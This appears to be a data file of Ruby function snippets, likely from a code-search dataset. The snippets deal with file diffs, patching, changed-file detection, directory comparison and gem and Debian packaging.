"def diff\n deprecation_notice!\n downstream = @cisauraus.downstreams(app, 1).first\n verify_downstream! downstream\n\n print_and_flush \"Comparing #{app} to #{downstream}...\"\n\n diff = @cisauraus.diff(app)\n print_and_flush \"done, \"\n\n if diff.size > 0\n display \"#{app} ahead by #{diff.size} #{plural('commit', diff.size)}:\"\n diff.each do |commit|\n commit_detail = `git log -n 1 --pretty=format:\" %h %ad %s (%an)\" --date=short #{commit} 2>/dev/null`\n if $?.exitstatus == 0\n display commit_detail\n else\n display \" #{commit}\"\n end\n end\n else\n display \"everything is up to date\"\n end\n end",
"def test_change_file_patch\n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal patched_file, file_contents('foo.rb')\n end",
"def pr_contains_code_changes\n files = danger_file.git.added_files + danger_file.git.modified_files\n\n !files.grep(/.swift/).empty?\n end",
"def patched\n vendored.collect do |dep|\n # TODO: right now just handling git based alternate sources,\n # should be able to handle other types bundler supports\n # (path and alternate rubygems src)\n next unless dep.source.is_a?(Bundler::Source::Git)\n src = dep.source\n\n # retrieve gem\n gem = if src.version\n Polisher::Gem.new(:name => dep.name, :version => src.version)\n else\n Polisher::Gem.retrieve(dep.name)\n end\n\n # retrieve dep\n git = Polisher::Git::Repo.new :url => src.uri\n git.clone unless git.cloned?\n git.checkout src.ref if src.ref\n\n # diff gem against git\n gem.diff(git.path)\n end.compact!\n end",
"def do_diff(base_path, path)\n if base_path.nil?\n # If there's no base path, then the file\n # must have been added\n puts(\"Added: #{path}\")\n name = path\n elsif path.nil?\n # If there's no new path, then the file\n # must have been deleted\n puts(\"Removed: #{base_path}\")\n name = base_path\n else\n # Otherwise, the file must have been modified\n puts \"Modified: #{path}\"\n name = path\n end\n\n # Set up labels for the two files\n base_label = \"#{name} (original)\"\n label = \"#{name} (new)\"\n\n # Output a unified diff between the two files\n puts \"=\" * 78\n differ = Svn::Fs::FileDiff.new(@base_root, base_path, @root, path)\n puts differ.unified(base_label, label)\n puts\n end",
"def touch_dependency source, specfile\n expect( cover_source_by( source, specfile)).to be_true\nend",
"def modified_files\n `git diff --cached --name-only --diff-filter=ACM --ignore-submodules=all`.split \"\\n\"\n end",
"def bootstrap_sh_has_been_modified\n \n modified = git.modified_files.include?(\"bootstrap.sh\")\n return modified\n \nend",
"def parse_pkg_diff(diffs)\n packages = []\n diffs.each do |diff|\n package = case diff[0]\n when '-' then removed_package(diff)\n when '+' then installed_package(diff)\n when '~' then updated_package(diff)\n end\n packages.push(package)\n end\n\n packages\n end",
"def isSourceStale?(sourcefile, targetext)\n\t\ttargetfile = toBuildDirFile(changeExt(sourcefile, targetext))\n\t\treturn (isStale?(targetfile, [sourcefile]))\n\tend",
"def legacy_repos\n Gem.sources.reject do |source_uri|\n source_uri = URI.parse source_uri\n spec_path = source_uri + \"specs.#{Gem.marshal_version}.gz\"\n\n begin\n @fetcher.fetch_size spec_path\n rescue Gem::RemoteFetcher::FetchError\n begin\n @fetcher.fetch_size(source_uri + 'yaml') # re-raise if non-repo\n rescue Gem::RemoteFetcher::FetchError\n alert_error \"#{source_uri} does not appear to be a repository\"\n raise\n end\n false\n end\n end\n end",
"def runDiffOperation(new_output, old_output, diff_folder)\n #Searching for New & updated files\n @files = Dir.glob(new_output+\"**/**\")\n for file in @files\n partName=file.split(new_output).last \n if (File.directory?(file))\n if !File.exist?(old_output+partName)\n if !File.exist?(diff_folder+partName)\n createFolder(diff_folder+partName)\n puts \"Dir Created -\" + partName\n else\n puts \"Target Dir Exists -\" + partName\n end\n end\n else\n #New file copy operation\n if !File.exist?(old_output+partName) \n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil\n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + diff_folder+folder\n end\n File.copy(file,diff_folder+folder)\n puts \"New File Copied -\"+file +\" to \"+diff_folder+folder\n #Updated file copy operation\n elsif !(File.compare(file,old_output+partName))\n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil \n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + diff_folder+folder\n end\n File.copy(file,diff_folder+folder)\n puts \"Updated File Copied -\"+file +\" to \"+diff_folder+folder\n end\n end\n end\n #Searching for Deleted files & creating the list\n deletedFileList=diff_folder+\"deletedFiles.list\"\n timestamp = Time.now.to_s()\n deletedFileName=\"\"\n deletedFilesCount=0;\n @files = Dir.glob(old_output+\"**/**\")\n for file in @files\n partName=file.split(old_output).last\n check=partName.include?'search/'\n if !File.exist?(new_output+partName) && !check\n if !(File.directory?(file))\n deletedFileName=partName.split(\"/\").last\n open(deletedFileList, 'a') { |f|\n f.puts deletedFileName\n }\n end\n# deletedFileName= timestamp +\"\\t\"+deletedFileName\n deletedFilesCount=deletedFilesCount+1 \n end\n end\n if Dir.glob(diff_folder+\"**/**\") .length==0\n if (File.directory?(diff_folder))\n Dir.rmdir(diff_folder)\n end\n if (File.directory?(@book_update_folder))\n Dir.rmdir(@book_update_folder)\n end \n puts \"No Changes made\"\n exit\n end\nend",
"def changed_files_since_deploy\n if File.exists?(\"log/latest-REVISION-syntaxcheck\")\n revision = File.read(\"log/latest-REVISION-syntaxcheck\").chomp\n\n `git whatchanged #{revision}..HEAD`.split(\"\\n\").select{|l| l =~ /^\\:/}.collect {|l| l.split(\"\\t\")[1]}.sort.uniq\n else\n puts \"log/latest-REVISION-syntaxcheck not found. run 'cap fetch_currently_deployed_version' to get it\"\n []\n end\n end",
"def test_verify_package_checksum\n assert_nothing_raised('verify good checksum') { Tpkg::verify_package_checksum(@pkgfile) }\n\n # Add a few characters to the inner checksummed tarball and test that\n # it now fails the checksum verification\n tar = Tpkg::find_tar\n Dir.mktmpdir('workdir') do |workdir|\n system(\"#{tar} -C #{workdir} -xf #{@pkgfile}\") || abort\n File.open(File.join(workdir, 'testpkg-1.0-1', 'tpkg.tar'), 'a') do |file|\n file.write('xxxxxx')\n end\n badpkg = Tempfile.new('tpkgtest')\n system(\"#{tar} -C #{workdir} -cf #{badpkg.path} testpkg-1.0-1\") || abort\n assert_raise(RuntimeError, 'verify bad checksum') { Tpkg::verify_package_checksum(badpkg.path) }\n end\n\n # Confirm that checksum verification also fails on something that isn't a valid package\n puts '#'\n puts '# Errors expected here'\n puts '#'\n boguspkg = Tempfile.new('tpkgtest')\n boguspkg.puts('xxxxxx')\n boguspkg.close\n assert_raise(RuntimeError, NoMethodError, 'verify bogus non-tarball') { Tpkg::verify_package_checksum(boguspkg.path) }\n # And for completeness how about something that is a tarball but not a valid package\n boguspkg2 = Tempfile.new('tpkgtest')\n system(\"#{tar} -cf #{boguspkg2.path} #{boguspkg.path}\")\n assert_raise(RuntimeError, NoMethodError, 'verify bogus tarball') { Tpkg::verify_package_checksum(boguspkg2.path) }\n end",
"def runDiffOperation(new_output, old_output, diff_folder)\n #Searching for New & updated files\n @files = Dir.glob(new_output+\"**/**\")\n for file in @files\n partName=file.split(new_output).last \n if (File.directory?(file))\n if !File.exist?(old_output+partName)\n if !File.exist?(diff_folder+partName)\n createFolder(diff_folder+partName)\n puts \"Dir Created -\" + partName\n else\n puts \"Target Dir Exists -\" + partName\n end\n end\n else\n #New file copy operation\n if !File.exist?(old_output+partName) \n folder= partName.split(partName.split(\"/\").last).first\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + partName\n end\n File.copy(file,diff_folder+folder)\n puts \"New File Copied -\"+file\n #Updated file copy operation\n elsif !(File.compare(file,old_output+partName))\n folder= partName.split(partName.split(\"/\").last).first\n if folder==nil \n folder=\"\"\n end\n if !File.exist?(diff_folder+folder)\n createFolder(diff_folder+folder)\n puts \"Dir Created -\" + partName\n end\n File.copy(file,diff_folder+folder)\n puts \"Updated File Copied -\"+file\n end\n end\n end\n #Searching for Deleted files & creating the list\n deletedFileList=diff_folder+\"deletedList.list\"\n timestamp = Time.now.to_s()\n deletedFileName=\"\"\n deletedFilesCount=0;\n @files = Dir.glob(old_output+\"**/**\")\n for file in @files\n partName=file.split(old_output).last\n if !File.exist?(new_output+partName)\n if (File.directory?(file))\n deletedFileName=partName + \"/\"\n else\n deletedFileName=partName\n end\n# deletedFileName= timestamp +\"\\t\"+deletedFileName\n open(deletedFileList, 'a') { |f|\n f.puts deletedFileName\n }\n deletedFilesCount=deletedFilesCount+1 \n end\n end\n if Dir.glob(diff_folder+\"**/**\") .length==0\n if (File.directory?(@book_prod_final_update_folder))\n Dir.rmdir(@book_prod_final_update_folder)\n end\n if (File.directory?(diff_folder))\n Dir.rmdir(diff_folder)\n end\n if (File.directory?(@book_update_folder))\n Dir.rmdir(@book_update_folder)\n end \n puts \"No Changes made\"\n exit\n end\nend",
"def tarball\n Dir[\"#{dest}/#{SCOPE}-#{gemspec.name}-#{gemspec.version}.tgz\"].first\n end",
"def copy_files\n message \"Checking for existing #{@@app_name.capitalize} install in #{install_directory}\"\n files_yml = File.join(install_directory,'installer','files.yml')\n old_files = read_yml(files_yml) rescue Hash.new\n \n message \"Reading files from #{source_directory}\"\n new_files = sha1_hash_directory_tree(source_directory)\n new_files.delete('/config/database.yml') # Never copy this.\n \n # Next, we compare the original install hash to the current hash. For each\n # entry:\n #\n # - in new_file but not in old_files: copy\n # - in old files but not in new_files: delete\n # - in both, but hash different: copy\n # - in both, hash same: don't copy\n #\n # We really should add a third hash (existing_files) and compare against that\n # so we don't overwrite changed files.\n\n added, changed, deleted, same = hash_diff(old_files, new_files)\n \n if added.size > 0\n message \"Copying #{added.size} new files into #{install_directory}\"\n added.keys.sort.each do |file|\n message \" copying #{file}\"\n copy_one_file(file)\n end\n end\n \n if changed.size > 0\n message \"Updating #{changed.size} files in #{install_directory}\"\n changed.keys.sort.each do |file|\n message \" updating #{file}\"\n copy_one_file(file)\n end\n end\n \n if deleted.size > 0\n message \"Deleting #{deleted.size} files from #{install_directory}\"\n \n deleted.keys.sort.each do |file|\n message \" deleting #{file}\"\n rm(File.join(install_directory,file)) rescue nil\n end\n end\n \n write_yml(files_yml,new_files)\n end",
"def brewfile_has_been_modified\n \n modified = git.modified_files.include?(\"Brewfile\")\n return modified\n \nend",
"def source_modified_or_dest_missing?(source_path, dest_path); end",
"def patch(diffs)\n @hash = nil # invalidate any cached image\n\n Dir.chdir(root) do\n diffs.each do |diff|\n flag, key, v1, _ = diff\n # if key =~ /\\[/\n # keyname = key.match(/^(.*)\\[\\]$/).captures\n # elsif key =~ /\\./\n # keyname, subkey = key.match(/^(.*)\\.(.*)$/).captures\n # else\n # keyname = key\n # end\n\n dirname, filename, fieldname = Treet::Repo.filefor(key)\n filepath = \"#{dirname}/#{filename}\"\n\n case flag\n when '~'\n # change a value in place\n # load the current data & overwrite with the new value\n # idempotent: this will overwrite the file with the same contents\n if fieldname\n # hash entry\n data = File.exists?(filepath) ? JSON.load(File.open(filepath)) : {}\n data[fieldname] = v1\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n else\n # string entry\n File.open(filepath, \"w\") {|f| f << v1}\n end\n\n when '+'\n # add something\n if fieldname\n # writing a value into a hash\n # idempotent: this will overwrite the file with the same contents\n data = File.exists?(filepath) ? JSON.load(File.open(filepath)) : {}\n data[fieldname] = v1\n Dir.mkdir(dirname) unless Dir.exists?(dirname)\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n else\n # writing an entire hash into an array entry\n # idempotent: this will overwrite the file with the same contents\n subfile = \"#{dirname}/#{Treet::Hash.digestify(v1)}\"\n Dir.mkdir(dirname) unless Dir.exists?(dirname)\n case v1\n when Hash\n # hash entry\n File.open(subfile, \"w\") {|f| f << JSON.pretty_generate(v1)}\n else\n # string entry - create empty file with this name\n FileUtils.touch(subfile)\n end\n end\n\n when '-'\n # remove something\n if fieldname\n # this is a key in a subhash\n if File.exists?(filepath)\n # if the subhash is missing, there's nothing to remove, so do nothing (for idempotence)\n data = JSON.load(File.open(filepath))\n data.delete(fieldname)\n if data.empty?\n # all keys have been removed, clean up the file\n File.delete(filename)\n else\n File.open(filepath, \"w\") {|f| f << JSON.pretty_generate(data)}\n end\n end\n elsif dirname == \".\"\n # this is a top-level string\n File.delete(filename) if File.exists?(filename) # need the existence check for idempotence\n else\n # this is an array, we look for a match on the entire contents via digest\n subfile = \"#{dirname}/#{Treet::Hash.digestify(v1)}\"\n File.delete(subfile) if File.exists?(subfile) # need the existence check for idempotence\n # TODO: if dirname is now empty, should it be removed? is that worthwhile?\n end\n end\n end\n end\n\n to_hash # ?? return the patched data? or no return value? true/false for success?\n end",
"def updated_source_file; end",
"def test_git_diff_to_a\n work_tree = Dir.mktmpdir\n begin\n Dir.chdir(work_tree) do\n `git init`\n `git commit --allow-empty -m 'init'`\n `git worktree add --quiet child`\n Dir.chdir('child') do\n result = Git.open('.').diff.to_a\n assert_equal([], result)\n end\n end\n ensure\n FileUtils.rm_rf(work_tree)\n end\n end",
"def check_update(component_def, spec, gem_name_to_version)\n component_def.each_line do |line|\n # TODO: Some of the component files handle multiple versions with a case statement (for example net-ssh). \n # Add more logic to compare each of those versions. For now there are only a hand full. \n if line =~ /pkg.version/\n ver = Gem::Version.new(line.scan(/\\d\\.*/).join(''))\n if gem_name_to_version[spec.name] > ver\n warn \"Update needed for: #{spec.name} \\nUpgrade from #{ver} to #{gem_name_to_version[spec.name]}\\n\\n\"\n end\n end\n end\nend",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd,\n prefix: \"apaka-\",\n logfile: nil,\n include_removal: false\n )\n Dir.chdir(directory) do\n Packager.debug (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n cmd = [\"dpkg-source\", \"--commit\"]\n cmd << \"--include-removal\" if include_removal\n cmd << \".\"\n cmd << prefix + patch_name\n\n if !system(*cmd,\n [:out, :err] => redirection(logfile,\"a\"),\n :close_others => true)\n raise RuntimeError, \"#{self.class}#{__method__}: failed to commit #{patch_name}\"\n end\n end\n end",
"def compareDirs( relative = \"\" )\n # Combine the base path with the relative path\n original = File.expand_path( File.join( $original, relative ) )\n backup = File.expand_path( File.join( $backup, relative ) )\n\n # Return if this directory has been excluded\n if $options[:ignore].include?( original ) or $options[:ignore].include?( backup )\n $skippedCount += 1\n STDOUT.puts \"SKIP: Skipping comparison of [#{original}] and [#{backup}]\"\n return\n end\n\n # Make sure both directories exist\n unless File.directory?( original ) and File.directory?( backup )\n STDOUT.puts \"DIR: [#{original}] not found in [#{backup}]\"\n $diffCount += 1\n $diffCount += countItems( original ) if $options[:count]\n return\n end\n\n # If both directories exist, we check their contents\n begin\n Dir.foreach( original ) do |item|\n next if item == \".\" or item == \"..\"\n $itemCount += 1\n\n origPath = File.join( original, item )\n backupPath = File.join( backup, item )\n\n if File.directory? origPath\n # Skip symlinks if told to do so...\n if File.symlink?( origPath ) and not $options[:follow]\n $skippedCount += 1\n STDOUT.puts \"SYMLINK: [#{origPath}] skipped.\"\n next\n end\n # Stay on one filesystem if told to do so...\n outerDev = File::Stat.new( original ).dev\n innerDev = File::Stat.new( origPath ).dev\n if outerDev != innerDev and $options[:one_filesystem]\n $skippedCount += 1\n STDOUT.puts \"DIFFFS: [#{origPath}] is on a different file system. Skipped.\"\n next\n end\n compareDirs( File.join( relative, item ) )\n else # It's a file\n unless sameFile( origPath, backupPath )\n $diffCount += 1\n STDOUT.puts \"FILE: [#{origPath}] not found at, or doesn't match [#{backupPath}]\"\n end\n end\n end # Dir.foreach\n rescue Errno::EACCES\n STDOUT.puts \"ERROR: Can't read directory [#{original}]\"\n $errorCount += 1\n end\nend",
"def test_should_not_patch_without_fuzz\n @options[:fuzz] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_with_fuzz_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal (patched_file == file_contents('foo.rb')), false\n end",
"def find_files(src,dest,options)\r\n src_files = self.find_as_relative( src, options[:excludes] )\r\n dest_files = self.find_as_relative( dest, options[:excludes] )\r\n\r\n # output target files\r\n puts \" 元フォルダ:\" + src_files.size.to_s + \"件\" if self.debug?\r\n puts \"同期先フォルダ:\" + dest_files.size.to_s + \"件\" if self.debug?\r\n #pp src_files if self.debug?\r\n sleep 1 if self.debug?\r\n\r\n #両方にあるファイル名で中身が違うもので src の方が古いもの\r\n same_name_files = (dest_files & src_files)\r\n same_name_files.reject!{|e|\r\n #ファイルが同じモノは省く\r\n next unless File.exists?( File.expand_path(e,dest))\r\n puts \"compare file bin. #{e}\" if self.debug? || self.verbose?\r\n $stdout.flush if self.debug?\r\n FileUtils.cmp( File.expand_path(e,src) , File.expand_path(e,dest) ) \r\n } if options[:strict]\r\n same_name_files.reject!{|e|\r\n #ファイルサイズが同じモノを省く(全部比較する代替手段)\r\n next unless File.exists?( File.expand_path(e,dest))\r\n puts \"size/mtime compare #{e}\" if self.debug? || self.verbose?\r\n File.size(File.expand_path(e,src)) == File.size( File.expand_path(e,dest))\r\n #&& File.mtime(File.expand_path(e,src)) == File.mtime( File.expand_path(e,dest) )\r\n } unless options[:strict]\r\n if options[:update] then\r\n same_name_files= same_name_files.select{|e|\r\n puts \"mtime is newer #{e}\" if self.debug? || self.verbose?\r\n (File.mtime(File.expand_path(e,src)) > File.mtime( File.expand_path(e,dest)))\r\n }\r\n end\r\n if options[:overwrite] == false then\r\n same_name_files= same_name_files.reject{|e|\r\n puts \"can over write? #{e}\" if self.debug? || self.verbose?\r\n (File.exists?(File.expand_path(e,src)) && File.exists?( File.expand_path(e,dest)))\r\n }\r\n end\r\n $stdout.flush if self.debug?\r\n files_not_in_dest = (src_files - dest_files)\r\n #files\r\n files =[]\r\n files = (files_not_in_dest + same_name_files ).flatten\r\n files\r\n end",
"def dpkg_commit_changes(patch_name, directory = Dir.pwd)\n Dir.chdir(directory) do\n Packager.info (\"commit changes to debian pkg: #{patch_name}\")\n # Since dpkg-source will open an editor we have to\n # take this approach to make it pass directly in an\n # automated workflow\n ENV['EDITOR'] = \"/bin/true\"\n `dpkg-source --commit . #{patch_name}`\n end\n end",
"def test_change_file_with_fuzz_patch\n @options[:fuzz] = 2\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_change_file_with_fuzz_patch\n\n # Creates new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n assert_equal patched_file_with_fuzz, file_contents('foo.rb')\n end",
"def diff(other_sha1)\n git \"diff #{other_sha1} -- #{@path}\"\n end",
"def diff_to_compare; end",
"def apply_diff(diff)\n diff.deltas.each do |d|\n case d.status\n when :deleted\n remove_file(d.new_file[:path])\n File.delete(File.join(path, path))\n when :added, :modified\n add_file(d.new_file[:path])\n when :renamed\n remove_file(d.old_file[:path])\n File.delete(File.join(path, path))\n add_file(d.new_file[:path])\n else\n logger.warn(\"File has a status of #{d.status}\")\n end\n end\n end",
"def test_file_size_differs\n TestHelper::FillContents($source_dir, {\n 'A.txt' => {\n type: 'file',\n contents: 'SuperLongFileThatHasLotsOfStuff',\n }\n })\n TestHelper::FillContents($backup_dir, {\n 'A.txt' => {\n type: 'file',\n contents: 'ShortFile',\n }\n })\n expected_results = {\n items_processed: 2,\n similarities: 1,\n differences: 1,\n skipped: 0,\n errors: 0,\n }\n actual_results = TestHelper::RunVerification(\n [$source_dir, $backup_dir]\n )\n assertResultsAsExpected(expected_results, actual_results)\n end",
"def compare(upstream_source)\n same = {}\n diff = {}\n upstream_source.deps.each do |d|\n spec_reqs = self.requirements_for_gem(d.name)\n spec_reqs_specifier = spec_reqs.empty? ? nil :\n spec_reqs.collect { |req| req.specifier }\n\n if spec_reqs.nil?\n diff[d.name] = {:spec => nil,\n :upstream => d.requirement.to_s}\n\n elsif !spec_reqs.any? { |req| req.matches?(d) } ||\n !self.has_all_requirements_for?(d)\n diff[d.name] = {:spec => spec_reqs_specifier,\n :upstream => d.requirement.to_s}\n\n elsif !diff.has_key?(d.name)\n same[d.name] = {:spec => spec_reqs_specifier,\n :upstream => d.requirement.to_s }\n end\n end\n\n @metadata[:requires].each do |req|\n next unless req.gem?\n\n upstream_dep = upstream_source.deps.find { |d| d.name == req.gem_name }\n\n if upstream_dep.nil?\n diff[req.gem_name] = {:spec => req.specifier,\n :upstream => nil}\n\n elsif !req.matches?(upstream_dep)\n diff[req.gem_name] = {:spec => req.specifier,\n :upstream => upstream_dep.requirement.to_s }\n\n elsif !diff.has_key?(req.gem_name)\n same[req.gem_name] = {:spec => req.specifier,\n :upstream => upstream_dep.requirement.to_s }\n end\n end unless @metadata[:requires].nil?\n\n {:same => same, :diff => diff}\n end",
"def test_ut_diff_result_02\n original_file = OriginalFile.new(\n :source_name => \"simple 1\",\n :path => \"http\",\n :normal_result_id => 349898,\n :hirisk_result_id => 4564,\n :critical_result_id => 45 )\n assert_equal(\"simple 1\",original_file.source_name)\n assert_equal(349898,original_file.normal_result_id)\n assert_equal(4564,original_file.hirisk_result_id)\n assert_equal(45,original_file.critical_result_id)\n assert_equal(\"http\",original_file.path)\n end",
"def test_tar\n\tx = \"test_tar\"\n\t@output = @s.archive({ 'files'=> [@test_directory_1_Path], 'format'=>'tar' , 'recurse'=>false } )\n\t#puts @output['archiveFile']\n\t\n\t@testid= 1\n\tTar.open(@output['archiveFile'], File::RDONLY, 0644, Tar::GNU | Tar::VERBOSE) do |tar|\n while tar.read # or 'tar.each do ...'\n #puts tar.pathname\n\t\t\n\t\t\n # tar.print_long_ls\n\n if tar.reg? && tar.pathname!=\"test_directory_1/.DS_Store\" # regular file\n tar.extract_file('test')\n\t\t want = File.read(File.join(@testdir, tar.pathname))\n\t\t puts tar.pathname\n\t\t #asserting bar1,2,3 from tar file is same as original bar1,2,3\n\t\t assert_log( want, File.read('test'), $log, x, @testid)\n end\n end\n\n ##if extract all files\n #tar.extract_all\n end\n\n\n ##for gzip archive\n #Tar.gzopen('foo.tar.gz', ...\n\n ##for bzip2 archive\n #Tar.bzopen('foo.tar.bz2', ...\n \n \n \n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def main\n last_good_root = from_file($cache_dir + '/root.txt') ||\n from_file('config/root.txt') ||\n raise(\"Can't find root.txt\")\n\n repository = Gem::TUF::Repository.new(\n root: JSON.parse(last_good_root),\n bucket: FileCachingBucket.new(HttpBucket.new($host))\n )\n\n gem_name = ARGV.shift\n\n specs = repository.target('latest_specs.4.8.gz')\n raise \"could not find latest_specs.4.8.gz\" unless specs\n specs = unmarshal_gz specs\n gem = specs.detect {|x| x[0] == gem_name } || raise(\"Can't find gem #{gem}\")\n\n gem_with_version = \"#{gem[0]}-#{gem[1]}\"\n gem_path = \"gems/#{gem_with_version}.gem\"\n gemspec_path = \"quick/Marshal.4.8/#{gem_with_version}.gemspec.rz\"\n\n repository.target(gemspec_path)\n repository.target(gem_path)\n\n puts \"Downloaded #{gem_path} and #{gemspec_path}\"\nend",
"def needs_pushing?(dir = Dir.pwd)\n rval = false\n branch = get_branch\n if is_origin_branch? branch\n Dir.chdir(dir) do\n rval = (%x{git diff \"#{branch}\"..origin/\"#{branch}\"}.size > 0)\n end\n end\n rval\nend",
"def add_template_repository_to_source_path\n if __FILE__ =~ %r{\\Ahttps?://}\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n p \"!!!!!!!!!!!!!!!!!!!!\"\n require \"tmpdir\"\n source_paths.unshift(tempdir = Dir.mktmpdir(\"rails-template-\"))\n at_exit { FileUtils.remove_entry(tempdir) }\n git :clone => [\n \"--quiet\",\n \"https://github.com/velpradeep/react-rails-template-app.git\",\n tempdir\n ].map(&:shellescape).join(\" \")\n\n if (branch = __FILE__[%r{rails-template/(.+)/template.rb}, 1])\n Dir.chdir(tempdir) { git :checkout => branch }\n end\n else\n source_paths.unshift(File.dirname(__FILE__))\n end\nend",
"def dependency_fresh?(environment, dep)\n path, mtime, hexdigest = dep.pathname.to_s, dep.mtime, dep.digest\n\n stat = environment.stat(path)\n\n # If path no longer exists, its definitely stale.\n if stat.nil?\n return false\n end\n\n # Compare dependency mime to the actual mtime. If the\n # dependency mtime is newer than the actual mtime, the file\n # hasn't changed since we created this `Asset` instance.\n #\n # However, if the mtime is newer it doesn't mean the asset is\n # stale. Many deployment environments may recopy or recheckout\n # assets on each deploy. In this case the mtime would be the\n # time of deploy rather than modified time.\n if mtime >= stat.mtime\n return true\n end\n\n digest = environment.file_digest(path)\n\n # If the mtime is newer, do a full digest comparsion. Return\n # fresh if the digests match.\n if hexdigest == digest.hexdigest\n return true\n end\n\n # Otherwise, its stale.\n false\n end",
"def git_diff_next\n unstaged_git_files.each do |unstaged_file|\n if unstaged_file.untracked?\n `echo UNTRACKED FILE #{unstaged_file.filename} >&2`\n copy_to_clipboard(unstaged_file)\n break\n elsif unstaged_file.deleted?\n `echo DELETED FILE #{unstaged_file.filename} >&2`\n copy_to_clipboard(unstaged_file)\n break\n elsif !unstaged_file.has_unstaged_changes?\n next\n else\n copy_to_clipboard(unstaged_file)\n exec \"git diff #{unstaged_file.filename}\"\n end\n end\nend",
"def update\n `cd #{__dir__} && git pull origin master`\n install\nend",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def cleanup_extract_source(attrs={})\n\n execute \"cleanup_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"rm -rf #{attrs['src_dir']}\"\n not_if do ! FileTest.directory?(attrs['src_dir']) end\n action :run\n end\n\n extract_flags = \"tar zxf\" if attrs['src_file'] =~ /tar\\.gz/\n extract_flags = \"tar jxf\" if attrs['src_file'] =~ /tar\\.bz2/\n extract_flags = \"7za x\" if attrs['src_file'] =~ /7z/\n\n execute \"extract_source\" do\n cwd Chef::Config[:file_cache_path]\n command \"#{extract_flags} #{Chef::Config[:file_cache_path]}/#{attrs['src_file']}\"\n action :run\n end\n\nend",
"def test_delete_file_patch\n @options[:strip] = 0\n \n gemfile = bake_testing_gem\n\n patches = []\n patches << bake_new_file_patch\n patches << bake_delete_file_patch\n\n # Create a new patched gem in @gems_dir\n patcher = Gem::Patcher.new(gemfile, @gems_dir)\n patched_gem = patcher.patch_with(patches, @options)\n\n # Unpack\n package = Gem::Package.new patched_gem\n package.extract_files @gems_dir\n\n # Only foo.rb should stay in /lib, bar.rb should be gone\n assert_raises(RuntimeError, 'File not found') {\n file_contents(File.join @lib_dir, 'bar.rb')\n }\n end",
"def list_local_patches(patchdir)\n if File.directory?(patchdir)\n file_list = Dir.entries(patchdir)\n file_list.each do |local_file|\n if local_file.match(/zip$/)\n puts local_file\n end\n end\n end\nend",
"def changed_files\n DeliveryTruck::Helpers.changed_files(\n DeliveryTruck::Helpers.pre_change_sha(node),\n node['delivery']['change']['sha'],\n node\n )\n end",
